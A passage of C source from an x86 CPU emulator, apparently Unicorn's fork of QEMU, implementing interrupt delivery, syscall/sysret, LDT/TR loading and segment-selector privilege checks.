1; } return 0; } #ifdef TARGET_X86_64 #define SET_ESP(val, sp_mask) \ do { \ if ((sp_mask) == 0xffff) { \ env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | \ ((val) & 0xffff); \ } else if ((sp_mask) == 0xffffffffLL) { \ env->regs[R_ESP] = (uint32_t)(val); \ } else { \ env->regs[R_ESP] = (val); \ } \ } while (0) #else #define SET_ESP(val, sp_mask) \ do { \ env->regs[R_ESP] = (env->regs[R_ESP] & ~(sp_mask)) | \ ((val) & (sp_mask)); \ } while (0) #endif /* in 64-bit machines, this can overflow. 
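(ssp + sp is evaluated at full target_ulong width, so the 16- or
32-bit wrap-around a real stack segment would perform is lost.)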
So this segment addition macro * can be used to trim the value to 32-bit whenever needed */ #define SEG_ADDL(ssp, sp, sp_mask) ((uint32_t)((ssp) + (sp & (sp_mask)))) /* XXX: add a is_user flag to have proper security support */ #define PUSHW_RA(ssp, sp, sp_mask, val, ra) \ { \ sp -= 2; \ cpu_stw_kernel_ra(env, (ssp) + (sp & (sp_mask)), (val), ra); \ } #define PUSHL_RA(ssp, sp, sp_mask, val, ra) \ { \ sp -= 4; \ cpu_stl_kernel_ra(env, SEG_ADDL(ssp, sp, sp_mask), (uint32_t)(val), ra); \ } #define POPW_RA(ssp, sp, sp_mask, val, ra) \ { \ val = cpu_lduw_kernel_ra(env, (ssp) + (sp & (sp_mask)), ra); \ sp += 2; \ } #define POPL_RA(ssp, sp, sp_mask, val, ra) \ { \ val = (uint32_t)cpu_ldl_kernel_ra(env, SEG_ADDL(ssp, sp, sp_mask), ra); \ sp += 4; \ } #define PUSHW(ssp, sp, sp_mask, val) PUSHW_RA(ssp, sp, sp_mask, val, 0) #define PUSHL(ssp, sp, sp_mask, val) PUSHL_RA(ssp, sp, sp_mask, val, 0) #define POPW(ssp, sp, sp_mask, val) POPW_RA(ssp, sp, sp_mask, val, 0) #define POPL(ssp, sp, sp_mask, val) POPL_RA(ssp, sp, sp_mask, val, 0) /* protected mode interrupt */ static void do_interrupt_protected(CPUX86State *env, int intno, int is_int, int error_code, unsigned int next_eip, int is_hw) { SegmentCache *dt; target_ulong ptr, ssp; int type, dpl, selector, ss_dpl, cpl; int has_error_code, new_stack, shift; uint32_t e1, e2, offset, ss = 0, esp, ss_e1 = 0, ss_e2 = 0; uint32_t old_eip, sp_mask; int vm86 = env->eflags & VM_MASK; has_error_code = 0; if (!is_int && !is_hw) { has_error_code = exception_has_error_code(intno); } if (is_int) { old_eip = next_eip; } else { old_eip = env->eip; } dt = &env->idt; if (intno * 8 + 7 > dt->limit) { raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); } ptr = dt->base + intno * 8; e1 = cpu_ldl_kernel(env, ptr); e2 = cpu_ldl_kernel(env, ptr + 4); /* check gate type */ type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; switch (type) { case 5: /* task gate */ /* must do that check here to return the correct error code */ if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); } switch_tss(env, intno * 8, e1, e2, SWITCH_TSS_CALL, old_eip); if (has_error_code) { int type; uint32_t mask; /* push the error code */ type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; shift = type >> 3; if (env->segs[R_SS].flags & DESC_B_MASK) { mask = 0xffffffff; } else { mask = 0xffff; } esp = (env->regs[R_ESP] - (2 << shift)) & mask; ssp = env->segs[R_SS].base + esp; if (shift) { cpu_stl_kernel(env, ssp, error_code); } else { cpu_stw_kernel(env, ssp, error_code); } SET_ESP(esp, mask); } return; case 6: /* 286 interrupt gate */ case 7: /* 286 trap gate */ case 14: /* 386 interrupt gate */ case 15: /* 386 trap gate */ break; default: raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); break; } dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; /* check privilege if software int */ if (is_int && dpl < cpl) { raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); } /* check valid bit */ if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); } selector = e1 >> 16; offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); if ((selector & 0xfffc) == 0) { raise_exception_err(env, EXCP0D_GPF, 0); } if (load_segment(env, &e1, &e2, selector) != 0) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (dpl > cpl) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_P_MASK)) { 
raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); } if (e2 & DESC_C_MASK) { dpl = cpl; } if (dpl < cpl) { /* to inner privilege */ get_ss_esp_from_tss(env, &ss, &esp, dpl, 0); if ((ss & 0xfffc) == 0) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if ((ss & 3) != dpl) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if (load_segment(env, &ss_e1, &ss_e2, ss) != 0) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; if (ss_dpl != dpl) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if (!(ss_e2 & DESC_S_MASK) || (ss_e2 & DESC_CS_MASK) || !(ss_e2 & DESC_W_MASK)) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if (!(ss_e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } new_stack = 1; sp_mask = get_sp_mask(ss_e2); ssp = get_seg_base(ss_e1, ss_e2); } else { /* to same privilege */ if (vm86) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } new_stack = 0; sp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; esp = env->regs[R_ESP]; } shift = type >> 3; #if 0 /* XXX: check that enough room is available */ push_size = 6 + (new_stack << 2) + (has_error_code << 1); if (vm86) { push_size += 8; } push_size <<= shift; #endif if (shift == 1) { if (new_stack) { if (vm86) { PUSHL(ssp, esp, sp_mask, env->segs[R_GS].selector); PUSHL(ssp, esp, sp_mask, env->segs[R_FS].selector); PUSHL(ssp, esp, sp_mask, env->segs[R_DS].selector); PUSHL(ssp, esp, sp_mask, env->segs[R_ES].selector); } PUSHL(ssp, esp, sp_mask, env->segs[R_SS].selector); PUSHL(ssp, esp, sp_mask, env->regs[R_ESP]); } PUSHL(ssp, esp, sp_mask, cpu_compute_eflags(env)); PUSHL(ssp, esp, sp_mask, env->segs[R_CS].selector); PUSHL(ssp, esp, sp_mask, old_eip); if (has_error_code) { PUSHL(ssp, esp, sp_mask, error_code); } } else { if (new_stack) { if (vm86) { PUSHW(ssp, esp, sp_mask, env->segs[R_GS].selector); PUSHW(ssp, esp, sp_mask, env->segs[R_FS].selector); PUSHW(ssp, esp, sp_mask, env->segs[R_DS].selector); PUSHW(ssp, esp, sp_mask, env->segs[R_ES].selector); } PUSHW(ssp, esp, sp_mask, env->segs[R_SS].selector); PUSHW(ssp, esp, sp_mask, env->regs[R_ESP]); } PUSHW(ssp, esp, sp_mask, cpu_compute_eflags(env)); PUSHW(ssp, esp, sp_mask, env->segs[R_CS].selector); PUSHW(ssp, esp, sp_mask, old_eip); if (has_error_code) { PUSHW(ssp, esp, sp_mask, error_code); } } /* interrupt gate clear IF mask */ if ((type & 1) == 0) { env->eflags &= ~IF_MASK; } env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); if (new_stack) { if (vm86) { cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0, 0); cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0, 0); cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0, 0); cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0, 0); } ss = (ss & ~3) | dpl; cpu_x86_load_seg_cache(env, R_SS, ss, ssp, get_seg_limit(ss_e1, ss_e2), ss_e2); } SET_ESP(esp, sp_mask); selector = (selector & ~3) | dpl; cpu_x86_load_seg_cache(env, R_CS, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); env->eip = offset; } #ifdef TARGET_X86_64 #define PUSHQ_RA(sp, val, ra) \ { \ sp -= 8; \ cpu_stq_kernel_ra(env, sp, (val), ra); \ } #define POPQ_RA(sp, val, ra) \ { \ val = cpu_ldq_kernel_ra(env, sp, ra); \ sp += 8; \ } #define PUSHQ(sp, val) PUSHQ_RA(sp, val, 0) #define POPQ(sp, val) POPQ_RA(sp, val, 0) static inline target_ulong get_rsp_from_tss(CPUX86State *env, int level) { X86CPU *cpu = env_archcpu(env); int index; #if 0 printf("TR: base=" TARGET_FMT_lx " limit=%x\n", env->tr.base, env->tr.limit); #endif if (!(env->tr.flags & DESC_P_MASK)) { cpu_abort(CPU(cpu), 
"invalid tss"); } index = 8 * level + 4; if ((index + 7) > env->tr.limit) { raise_exception_err(env, EXCP0A_TSS, env->tr.selector & 0xfffc); } return cpu_ldq_kernel(env, env->tr.base + index); } /* 64 bit interrupt */ static void do_interrupt64(CPUX86State *env, int intno, int is_int, int error_code, target_ulong next_eip, int is_hw) { SegmentCache *dt; target_ulong ptr; int type, dpl, selector, cpl, ist; int has_error_code, new_stack; uint32_t e1, e2, e3, ss; target_ulong old_eip, esp, offset; has_error_code = 0; if (!is_int && !is_hw) { has_error_code = exception_has_error_code(intno); } if (is_int) { old_eip = next_eip; } else { old_eip = env->eip; } dt = &env->idt; if (intno * 16 + 15 > dt->limit) { raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); } ptr = dt->base + intno * 16; e1 = cpu_ldl_kernel(env, ptr); e2 = cpu_ldl_kernel(env, ptr + 4); e3 = cpu_ldl_kernel(env, ptr + 8); /* check gate type */ type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; switch (type) { case 14: /* 386 interrupt gate */ case 15: /* 386 trap gate */ break; default: raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); break; } dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; /* check privilege if software int */ if (is_int && dpl < cpl) { raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); } /* check valid bit */ if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, intno * 16 + 2); } selector = e1 >> 16; offset = ((target_ulong)e3 << 32) | (e2 & 0xffff0000) | (e1 & 0x0000ffff); ist = e2 & 7; if ((selector & 0xfffc) == 0) { raise_exception_err(env, EXCP0D_GPF, 0); } if (load_segment(env, &e1, &e2, selector) != 0) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (dpl > cpl) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); } if (!(e2 & DESC_L_MASK) || (e2 & DESC_B_MASK)) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (e2 & DESC_C_MASK) { dpl = cpl; } if (dpl < cpl || ist != 0) { /* to inner privilege */ new_stack = 1; esp = get_rsp_from_tss(env, ist != 0 ? 
ist + 3 : dpl); ss = 0; } else { /* to same privilege */ if (env->eflags & VM_MASK) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } new_stack = 0; esp = env->regs[R_ESP]; } esp &= ~0xfLL; /* align stack */ PUSHQ(esp, env->segs[R_SS].selector); PUSHQ(esp, env->regs[R_ESP]); PUSHQ(esp, cpu_compute_eflags(env)); PUSHQ(esp, env->segs[R_CS].selector); PUSHQ(esp, old_eip); if (has_error_code) { PUSHQ(esp, error_code); } /* interrupt gate clear IF mask */ if ((type & 1) == 0) { env->eflags &= ~IF_MASK; } env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); if (new_stack) { ss = 0 | dpl; cpu_x86_load_seg_cache(env, R_SS, ss, 0, 0, dpl << DESC_DPL_SHIFT); } env->regs[R_ESP] = esp; selector = (selector & ~3) | dpl; cpu_x86_load_seg_cache(env, R_CS, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); env->eip = offset; } #endif #ifdef TARGET_X86_64 void helper_syscall(CPUX86State *env, int next_eip_addend) { // Unicorn: call registered syscall hooks struct hook *hook; uc_engine *uc = env->uc; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, env->eip)) continue; if (hook->insn == UC_X86_INS_SYSCALL) { JIT_CALLBACK_GUARD(((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data)); } // the last callback may already asked to stop emulation if (env->uc->stop_request) break; } env->eip += next_eip_addend; } #endif #ifdef TARGET_X86_64 void helper_sysret(CPUX86State *env, int dflag) { int cpl, selector; if (!(env->efer & MSR_EFER_SCE)) { raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } cpl = env->hflags & HF_CPL_MASK; if (!(env->cr[0] & CR0_PE_MASK) || cpl != 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } selector = (env->star >> 48) & 0xffff; if (env->hflags & HF_LMA_MASK) { cpu_load_eflags(env, (uint32_t)(env->regs[11]), TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | NT_MASK); if (dflag == 2) { cpu_x86_load_seg_cache(env, R_CS, (selector + 16) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | DESC_L_MASK); env->eip = env->regs[R_ECX]; } else { cpu_x86_load_seg_cache(env, R_CS, selector | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); env->eip = (uint32_t)env->regs[R_ECX]; } cpu_x86_load_seg_cache(env, R_SS, (selector + 8) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } else { env->eflags |= IF_MASK; cpu_x86_load_seg_cache(env, R_CS, selector | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); env->eip = (uint32_t)env->regs[R_ECX]; cpu_x86_load_seg_cache(env, R_SS, (selector + 8) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } } #endif /* real mode interrupt */ static void do_interrupt_real(CPUX86State *env, int intno, int is_int, int error_code, unsigned int next_eip) { SegmentCache *dt; target_ulong ptr, ssp; int selector; uint32_t offset, esp; uint32_t old_cs, old_eip; /* real mode (simpler!) 
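Each IVT entry is four bytes, a 16-bit offset followed by a 16-bit
segment, so vector n is fetched from idt.base + n * 4; e.g. INT 0x10
reads its offset at linear 0x40 and its segment at 0x42.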
*/ dt = &env->idt; if (intno * 4 + 3 > dt->limit) { raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); } ptr = dt->base + intno * 4; offset = cpu_lduw_kernel(env, ptr); selector = cpu_lduw_kernel(env, ptr + 2); esp = env->regs[R_ESP]; ssp = env->segs[R_SS].base; if (is_int) { old_eip = next_eip; } else { old_eip = env->eip; } old_cs = env->segs[R_CS].selector; /* XXX: use SS segment size? */ PUSHW(ssp, esp, 0xffff, cpu_compute_eflags(env)); PUSHW(ssp, esp, 0xffff, old_cs); PUSHW(ssp, esp, 0xffff, old_eip); /* update processor state */ env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | (esp & 0xffff); env->eip = offset; env->segs[R_CS].selector = selector; env->segs[R_CS].base = (selector << 4); env->eflags &= ~(IF_MASK | TF_MASK | AC_MASK | RF_MASK); } static void handle_even_inj(CPUX86State *env, int intno, int is_int, int error_code, int is_hw, int rm) { CPUState *cs = env_cpu(env); uint32_t event_inj = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj)); if (!(event_inj & SVM_EVTINJ_VALID)) { int type; if (is_int) { type = SVM_EVTINJ_TYPE_SOFT; } else { type = SVM_EVTINJ_TYPE_EXEPT; } event_inj = intno | type | SVM_EVTINJ_VALID; if (!rm && exception_has_error_code(intno)) { event_inj |= SVM_EVTINJ_VALID_ERR; x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj_err), error_code); } x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj), event_inj); } } /* * Begin execution of an interruption. is_int is TRUE if coming from * the int instruction. next_eip is the env->eip value AFTER the interrupt * instruction. It is only relevant if is_int is TRUE. */ static void do_interrupt_all(X86CPU *cpu, int intno, int is_int, int error_code, target_ulong next_eip, int is_hw) { CPUX86State *env = &cpu->env; #if 0 if (qemu_loglevel_mask(CPU_LOG_INT)) { if ((env->cr[0] & CR0_PE_MASK)) { // static int count; qemu_log("%6d: v=%02x e=%04x i=%d cpl=%d IP=%04x:" TARGET_FMT_lx " pc=" TARGET_FMT_lx " SP=%04x:" TARGET_FMT_lx, count, intno, error_code, is_int, env->hflags & HF_CPL_MASK, env->segs[R_CS].selector, env->eip, (int)env->segs[R_CS].base + env->eip, env->segs[R_SS].selector, env->regs[R_ESP]); if (intno == 0x0e) { qemu_log(" CR2=" TARGET_FMT_lx, env->cr[2]); } else { qemu_log(" env->regs[R_EAX]=" TARGET_FMT_lx, env->regs[R_EAX]); } qemu_log("\n"); log_cpu_state(CPU(cpu), CPU_DUMP_CCOP); #if 0 { int i; target_ulong ptr; qemu_log(" code="); ptr = env->segs[R_CS].base + env->eip; for (i = 0; i < 16; i++) { qemu_log(" %02x", ldub(ptr + i)); } qemu_log("\n"); } #endif count++; } } #endif if (env->cr[0] & CR0_PE_MASK) { if (env->hflags & HF_GUEST_MASK) { handle_even_inj(env, intno, is_int, error_code, is_hw, 0); } #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { do_interrupt64(env, intno, is_int, error_code, next_eip, is_hw); } else #endif { do_interrupt_protected(env, intno, is_int, error_code, next_eip, is_hw); } } else { if (env->hflags & HF_GUEST_MASK) { handle_even_inj(env, intno, is_int, error_code, is_hw, 1); } do_interrupt_real(env, intno, is_int, error_code, next_eip); } if (env->hflags & HF_GUEST_MASK) { CPUState *cs = CPU(cpu); uint32_t event_inj = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj)); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj), event_inj & ~SVM_EVTINJ_VALID); } } void x86_cpu_do_interrupt(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; if (cs->exception_index >= EXCP_VMEXIT) { assert(env->old_exception == -1); do_vmexit(env, 
cs->exception_index - EXCP_VMEXIT, env->error_code); } else { do_interrupt_all(cpu, cs->exception_index, env->exception_is_int, env->error_code, env->exception_next_eip, 0); /* successfully delivered */ env->old_exception = -1; } } void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw) { do_interrupt_all(env_archcpu(env), intno, 0, 0, 0, is_hw); } bool x86_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; int intno; interrupt_request = x86_cpu_pending_interrupt(cs, interrupt_request); if (!interrupt_request) { return false; } /* Don't process multiple interrupt requests in a single call. * This is required to make icount-driven execution deterministic. */ switch (interrupt_request) { case CPU_INTERRUPT_POLL: cs->interrupt_request &= ~CPU_INTERRUPT_POLL; // apic_poll_irq(cpu->apic_state); break; case CPU_INTERRUPT_SIPI: do_cpu_sipi(cpu); break; case CPU_INTERRUPT_SMI: cpu_svm_check_intercept_param(env, SVM_EXIT_SMI, 0, 0); cs->interrupt_request &= ~CPU_INTERRUPT_SMI; do_smm_enter(cpu); break; case CPU_INTERRUPT_NMI: cpu_svm_check_intercept_param(env, SVM_EXIT_NMI, 0, 0); cs->interrupt_request &= ~CPU_INTERRUPT_NMI; env->hflags2 |= HF2_NMI_MASK; do_interrupt_x86_hardirq(env, EXCP02_NMI, 1); break; case CPU_INTERRUPT_MCE: cs->interrupt_request &= ~CPU_INTERRUPT_MCE; do_interrupt_x86_hardirq(env, EXCP12_MCHK, 0); break; case CPU_INTERRUPT_HARD: cpu_svm_check_intercept_param(env, SVM_EXIT_INTR, 0, 0); cs->interrupt_request &= ~(CPU_INTERRUPT_HARD | CPU_INTERRUPT_VIRQ); // intno = cpu_get_pic_interrupt(env); intno = 0; //qemu_log_mask(CPU_LOG_TB_IN_ASM, // "Servicing hardware INT=0x%02x\n", intno); do_interrupt_x86_hardirq(env, intno, 1); break; case CPU_INTERRUPT_VIRQ: /* FIXME: this should respect TPR */ cpu_svm_check_intercept_param(env, SVM_EXIT_VINTR, 0, 0); intno = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_vector)); //qemu_log_mask(CPU_LOG_TB_IN_ASM, // "Servicing virtual hardware INT=0x%02x\n", intno); do_interrupt_x86_hardirq(env, intno, 1); cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; break; } /* Ensure that no TB jump will be modified as the program flow was changed. 
*/ return true; } void helper_lldt(CPUX86State *env, int selector) { SegmentCache *dt; uint32_t e1, e2; int index, entry_limit; target_ulong ptr; selector &= 0xffff; if ((selector & 0xfffc) == 0) { /* XXX: NULL selector case: invalid LDT */ env->ldt.base = 0; env->ldt.limit = 0; } else { if (selector & 0x4) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } dt = &env->gdt; index = selector & ~7; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { entry_limit = 15; } else #endif { entry_limit = 7; } if ((index + entry_limit) > dt->limit) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, GETPC()); e2 = cpu_ldl_kernel_ra(env, ptr + 4, GETPC()); if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { uint32_t e3; e3 = cpu_ldl_kernel_ra(env, ptr + 8, GETPC()); load_seg_cache_raw_dt(&env->ldt, e1, e2); env->ldt.base |= (target_ulong)e3 << 32; } else #endif { load_seg_cache_raw_dt(&env->ldt, e1, e2); } } env->ldt.selector = selector; } void helper_ltr(CPUX86State *env, int selector) { SegmentCache *dt; uint32_t e1, e2; int index, type, entry_limit; target_ulong ptr; selector &= 0xffff; if ((selector & 0xfffc) == 0) { /* NULL selector case: invalid TR */ env->tr.base = 0; env->tr.limit = 0; env->tr.flags = 0; } else { if (selector & 0x4) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } dt = &env->gdt; index = selector & ~7; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { entry_limit = 15; } else #endif { entry_limit = 7; } if ((index + entry_limit) > dt->limit) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, GETPC()); e2 = cpu_ldl_kernel_ra(env, ptr + 4, GETPC()); type = (e2 >> DESC_TYPE_SHIFT) & 0xf; if ((e2 & DESC_S_MASK) || (type != 1 && type != 9)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { uint32_t e3, e4; e3 = cpu_ldl_kernel_ra(env, ptr + 8, GETPC()); e4 = cpu_ldl_kernel_ra(env, ptr + 12, GETPC()); if ((e4 >> DESC_TYPE_SHIFT) & 0xf) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } load_seg_cache_raw_dt(&env->tr, e1, e2); env->tr.base |= (target_ulong)e3 << 32; } else #endif { load_seg_cache_raw_dt(&env->tr, e1, e2); } e2 |= DESC_TSS_BUSY_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, GETPC()); } env->tr.selector = selector; } // Unicorn: check the arguments before run cpu_x86_load_seg(). 
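/* A minimal usage sketch (hypothetical caller, not part of this
 * file): a register-write front end can run this predicate first so
 * a bad selector surfaces as an error code instead of raising a
 * guest exception halfway through the write:
 *
 *     int err = uc_check_cpu_x86_load_seg(env, R_SS, sel);
 *     if (err) {
 *         return err;                        // UC_ERR_EXCEPTION
 *     }
 *     cpu_x86_load_seg(env, R_SS, sel);      // safe to commit now
 */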
int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel) { int selector; uint32_t e2; int cpl, dpl, rpl; SegmentCache *dt; int index; target_ulong ptr; if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { return 0; } else { selector = sel & 0xffff; cpl = env->hflags & HF_CPL_MASK; if ((selector & 0xfffc) == 0) { /* null selector case */ if (seg_reg == R_SS #ifdef TARGET_X86_64 && (!(env->hflags & HF_CS64_MASK) || cpl == 3) #endif ) { return UC_ERR_EXCEPTION; } return 0; } else { if (selector & 0x4) { dt = &env->ldt; } else { dt = &env->gdt; } index = selector & ~7; if ((index + 7) > dt->limit) { return UC_ERR_EXCEPTION; } ptr = dt->base + index; e2 = cpu_ldl_kernel(env, ptr + 4); if (!(e2 & DESC_S_MASK)) { return UC_ERR_EXCEPTION; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (seg_reg == R_SS) { /* must be writable segment */ if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { return UC_ERR_EXCEPTION; } if (rpl != cpl || dpl != cpl) { return UC_ERR_EXCEPTION; } } else { /* must be readable segment */ if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { return UC_ERR_EXCEPTION; } if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { /* if not conforming code, test rights */ if (dpl < cpl || dpl < rpl) { return UC_ERR_EXCEPTION; } } } if (!(e2 & DESC_P_MASK)) { if (seg_reg == R_SS) { return UC_ERR_EXCEPTION; } else { return UC_ERR_EXCEPTION; } } } } return 0; } /* only works if protected mode and not VM86. seg_reg must be != R_CS */ void helper_load_seg(CPUX86State *env, int seg_reg, int selector) { uint32_t e1, e2; int cpl, dpl, rpl; SegmentCache *dt; int index; target_ulong ptr; selector &= 0xffff; cpl = env->hflags & HF_CPL_MASK; if ((selector & 0xfffc) == 0) { /* null selector case */ if (seg_reg == R_SS #ifdef TARGET_X86_64 && (!(env->hflags & HF_CS64_MASK) || cpl == 3) #endif ) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } cpu_x86_load_seg_cache(env, seg_reg, selector, 0, 0, 0); } else { if (selector & 0x4) { dt = &env->ldt; } else { dt = &env->gdt; } index = selector & ~7; if ((index + 7) > dt->limit) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, GETPC()); e2 = cpu_ldl_kernel_ra(env, ptr + 4, GETPC()); if (!(e2 & DESC_S_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (seg_reg == R_SS) { /* must be writable segment */ if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (rpl != cpl || dpl != cpl) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } } else { /* must be readable segment */ if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { /* if not conforming code, test rights */ if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } } } if (!(e2 & DESC_P_MASK)) { if (seg_reg == R_SS) { raise_exception_err_ra(env, EXCP0C_STACK, selector & 0xfffc, GETPC()); } else { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } } /* set the access bit if not already set */ if (!(e2 & DESC_A_MASK)) { e2 |= DESC_A_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, GETPC()); } cpu_x86_load_seg_cache(env, seg_reg, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); #if 0 qemu_log("load_seg: sel=0x%04x 
